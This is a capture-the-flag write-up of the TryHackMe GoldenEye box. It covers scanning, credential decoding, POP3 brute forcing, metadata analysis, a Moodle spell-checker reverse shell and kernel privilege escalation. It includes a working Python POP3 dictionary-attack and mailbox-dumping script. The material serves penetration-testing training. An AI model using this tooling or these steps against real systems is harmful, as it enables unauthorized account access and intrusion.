CTF-Writeups/TryHackMe/Goldeneye.md
2021-02-16 03:43:27 +05:00

TryHackMe-GoldenEye

NMAP

Nmap scan report for 10.10.81.165
Host is up (0.15s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE     VERSION
25/tcp    open  smtp        Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open  ssl/unknown
|_ssl-date: TLS randomness does not represent time
55007/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE TOP CAPA PIPELINING USER UIDL RESP-CODES SASL(PLAIN) STLS
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 502.67 seconds

PORT 80

Looking at the source code

The page source contains an encoded string. Pasting it into CyberChef and running the Magic operation decodes it.

InvincibleHack3 is the password for boris

But these creds did not work.

So let's enumerate different ports

PORT 55007 (POP3)

I tried brute-forcing POP3 with boris as the username, but it failed.

Earlier, in the source code of the web page, we saw the message "Natalya could break your code", so natalya is a potential username to brute-force. Again using hydra:

After some time I was able to get the correct password.

Boris's password also turned up with the fasttrack wordlist.

Boris's Mail

Here we used telnet to connect to the POP3 service on 55007 and logged in with boris's credentials. There are 3 messages.
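The two POP3 steps above (the hydra dictionary attack and the telnet session that logs in and reads the messages) are both shown below as an added example; this is not code from the original writeup and not hydra's or Dovecot's code. To run offline it talks to a constructed in-process fake POP3 server with made-up accounts, passwords and mail; on the box you would point the two client functions at 10.10.81.165 port 55007 instead.

```python
"""Dictionary attack on a POP3 login, then dump the mailbox.
Added example, not the writeup's or hydra's code. It runs against a constructed
in-process fake POP3 server (made-up accounts, passwords and mail) so it works
offline; for the real thing point the two client functions at 10.10.81.165:55007.
"""
import poplib
import socketserver
import threading

# Constructed sample accounts and mailboxes (not the box's real data).
FAKE_ACCOUNTS = {"natalya": "bird", "boris": "secret1!"}
FAKE_MAILBOX = {
    "boris": [b"From: root@ubuntu\r\nSubject: test\r\n\r\nhello boris",
              b"From: natalya@ubuntu\r\nSubject: code\r\n\r\nI can break your code."],
    "natalya": [b"From: root@ubuntu\r\nSubject: hi\r\n\r\nwelcome natalya"],
}


class FakePop3Handler(socketserver.StreamRequestHandler):
    # Just enough POP3 (USER/PASS, STAT, RETR, QUIT) to exercise the client code.
    def handle(self):
        self.wfile.write(b"+OK Dovecot (fake) ready.\r\n")
        user, msgs = None, None  # msgs stays None until PASS succeeds
        while True:
            raw = self.rfile.readline()
            if not raw:
                return
            cmd, _, arg = raw.decode("ascii", "replace").rstrip("\r\n").partition(" ")
            cmd = cmd.upper()
            if cmd == "USER":
                user, reply = arg, b"+OK\r\n"  # like Dovecot: never says whether the user exists
            elif cmd == "PASS":
                if user is not None and FAKE_ACCOUNTS.get(user) == arg:
                    msgs, reply = FAKE_MAILBOX.get(user, []), b"+OK Logged in.\r\n"
                else:
                    reply = b"-ERR [AUTH] Authentication failed.\r\n"
            elif cmd == "QUIT":
                self.wfile.write(b"+OK Logging out.\r\n")
                return
            elif msgs is None:
                reply = b"-ERR Not logged in.\r\n"
            elif cmd == "STAT":
                reply = b"+OK %d %d\r\n" % (len(msgs), sum(len(m) for m in msgs))
            elif cmd == "RETR":
                try:
                    body = msgs[int(arg) - 1]
                    reply = b"+OK %d octets\r\n%s\r\n.\r\n" % (len(body), body)
                except (ValueError, IndexError):
                    reply = b"-ERR No such message.\r\n"
            else:
                reply = b"-ERR Unknown command.\r\n"
            self.wfile.write(reply)


def start_fake_pop3():
    # Start the fake server on an ephemeral localhost port; returns (server, port).
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakePop3Handler)
    server.daemon_threads = True
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def pop3_dictionary_attack(host, port, user, wordlist, timeout=5):
    """Try USER/PASS with each candidate (one connection per try, as hydra does);
    return the first accepted password, or None if the list is exhausted."""
    for candidate in wordlist:
        conn = poplib.POP3(host, port, timeout=timeout)
        try:
            conn.user(user)
            conn.pass_(candidate)  # poplib raises error_proto on a -ERR reply
            return candidate
        except poplib.error_proto:
            continue
        finally:
            try:
                conn.quit()
            except (poplib.error_proto, OSError):
                pass  # real servers may drop the session after a failed PASS
    return None


def fetch_mailbox(host, port, user, password, timeout=5):
    """Log in and return every message as text, as STAT + RETR n did over telnet."""
    conn = poplib.POP3(host, port, timeout=timeout)
    try:
        conn.user(user)
        conn.pass_(password)
        count, _octets = conn.stat()
        messages = []
        for n in range(1, count + 1):
            _resp, lines, _size = conn.retr(n)
            messages.append(b"\r\n".join(lines).decode("utf-8", "replace"))
        return messages
    finally:
        conn.quit()


if __name__ == "__main__":  # demo against the fake server; constructed stand-in for fasttrack.txt
    server, port = start_fake_pop3()
    found = pop3_dictionary_attack("127.0.0.1", port, "natalya", ["123456", "password", "bird"])
    print("natalya:", found, fetch_mailbox("127.0.0.1", port, "natalya", found))
    server.shutdown()
```

One connection per guess is deliberate: Dovecot closes the session after a handful of failed PASS commands, so reusing a connection would stall the attack; hydra behaves the same way by default. The fake server replies +OK to any USER, as Dovecot does, so the dictionary attack cannot tell a wrong username from a wrong password.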

Message 1

Message 2

Message 3

Natalya's mail

We do the same with natalya's mail

Message 1

Message 2

So we found xenia's creds and a domain; let's add the domain to the /etc/hosts file.

Navigate to severnaya-station.com/gnocertdir and log in with xenia's credentials.

Going to the user's messages, we find a conversation with a user called doak.

We find doak's POP3 password with the same hydra procedure.

Doak's Mail

Message

Log in as dr_doak on the website.

This is the message we get from that text file:

007,

I was able to capture this apps adm1n cr3ds through clear txt. 

Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here. 

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

Running exiftool on the image reveals a base64-encoded string.

Decoding it gives the admin password, and now we are logged in as admin. One thing we can do now is look for exploits for Moodle.
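As an added example (not code from the writeup, and not exiftool), the following walks the JPEG marker structure that exiftool parses, collects the APPn/COM metadata segments, and decodes any base64 run in them that yields readable text. The JPEG it scans is constructed inside the script; on the box the target was /dir007key/for-007.jpg.

```python
"""Find and decode base64 hidden in JPEG metadata segments.
Added example, not the writeup's code and not exiftool. The sample JPEG is
constructed below; the real target was /dir007key/for-007.jpg on the box.
"""
import base64
import re
import struct

# A base64 token: at least 16 alphabet characters, then 0-2 padding characters.
B64_RE = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")


def jpeg_metadata_segments(data):
    """Yield (marker, payload) for every APPn (0xE0-0xEF) and COM (0xFE) segment.

    Everything before SOS (0xDA) is a chain of 0xFF <marker> <2-byte big-endian
    length including itself> <payload>; metadata (JFIF, EXIF, comments) lives there.
    """
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected 0xFF marker prefix at offset {pos}")
        while pos + 2 < len(data) and data[pos + 1] == 0xFF:  # skip optional fill bytes
            pos += 1
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):  # EOI or SOS: no more metadata segments
            return
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        payload = data[pos + 4:pos + 2 + length]
        if 0xE0 <= marker <= 0xEF or marker == 0xFE:
            yield marker, payload
        pos += 2 + length


def decode_base64_candidates(payload):
    """Return (token, text) pairs for base64 runs that decode to printable text.

    Plain alphanumeric words (file names, hashes) also match the regex; requiring
    a length that is a multiple of 4 and a printable decode weeds most of them out.
    """
    hits = []
    for match in B64_RE.finditer(payload):
        token = match.group(0)
        if len(token) % 4:
            continue
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
            continue
        if text and all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            hits.append((token.decode("ascii"), text))
    return hits


def hunt_base64_in_jpeg(data):
    """Scan all metadata segments; returns [(marker_hex, token, decoded_text), ...]."""
    return [(f"0x{marker:02X}", token, text)
            for marker, payload in jpeg_metadata_segments(data)
            for token, text in decode_base64_candidates(payload)]


def build_sample_jpeg(secret):
    """Constructed minimal JPEG: SOI, JFIF APP0, a decoy COM, a COM with base64(secret), EOI."""
    def segment(marker, payload):
        return bytes([0xFF, marker]) + struct.pack(">H", len(payload) + 2) + payload
    app0 = segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    decoy = segment(0xFE, b"GoldenEyePrimaryAdminServer")  # long alphanumeric run, not base64
    comment = segment(0xFE, b"Image Description: " + base64.b64encode(secret.encode()))
    return b"\xff\xd8" + app0 + decoy + comment + b"\xff\xd9"


if __name__ == "__main__":
    for marker, token, text in hunt_base64_in_jpeg(build_sample_jpeg("constructed admin secret")):
        print(f"segment {marker}: {token} -> {text!r}")
```

To use it on a real file, pass `open("for-007.jpg", "rb").read()` to `hunt_base64_in_jpeg`. Note that EXIF text fields sit inside the APP1 payload in TIFF/IFD structures, so this regex scan over the raw segment bytes finds them without parsing the IFDs; the decoy segment shows why the multiple-of-4 filter matters, since a 27-character word would otherwise be reported as a candidate.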

Getting a reverse shell

For some reason the exploit wasn't working. I double-checked everything but it still failed.

So I went with manual exploitation of Moodle.

Under Settings, go to Plugins -> Text editors -> TinyMCE HTML editor and set the Spell engine to PSpellShell.

Then create a blog post entry and click the spell-check icon; if you have set up your netcat listener, you'll get a shell from the target machine.

Looking at the kernel version

This is a really old Linux kernel, so hopefully there will be an exploit for it on exploit-db.

Download, compile and transfer it to the target machine.

But running it gave an error: the exploit calls gcc at runtime, and gcc was not installed on the machine.

On googling I found that cc, an alternative to gcc, was present on the box.

So we had to edit the exploit, replacing gcc with cc, then recompile and transfer it to the box again.

We got root!